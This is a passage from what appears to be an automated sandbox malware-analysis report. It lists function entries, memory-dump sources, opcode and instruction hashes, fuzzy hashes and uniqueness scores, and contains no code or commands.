                                                                                                                                                                                            • Instruction Fuzzy Hash: 0EC0127041620D9BD7159EA4B41EB69766CEB03306F005595940852205DB35452099E9
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736BC60 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 8a830cfdec60cb21f8f41b60fb2728cc4ccefd271d972eff6a42238d320dfcd8
                                                                                                                                                                                            • Instruction ID: d687a6146053cfe7b198e00675fae4b6ce8174b4fdc4e01c3c4065de68199d2b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a830cfdec60cb21f8f41b60fb2728cc4ccefd271d972eff6a42238d320dfcd8
                                                                                                                                                                                            • Instruction Fuzzy Hash: D8C0027004A2C25FEF569B28D8A54587F31EE0760875949DBC1938B492CA206885CB12
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                            Function 09F9F6B8 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a511696e8fc8eb21d28a74882ac7d7a734956055f21e9299ba0188c5723da133
                                                                                                                                                                                            • Instruction ID: 78d6c372e26457a8e75abf95a1c01a9889006151c04473cda3d4d20211523cc6
                                                                                                                                                                                            • Opcode Fuzzy Hash: a511696e8fc8eb21d28a74882ac7d7a734956055f21e9299ba0188c5723da133
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CE09270C6520ADAFF108F60C4467BEF7B1AB01398F50A4198411F7250D7784A488EA6
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%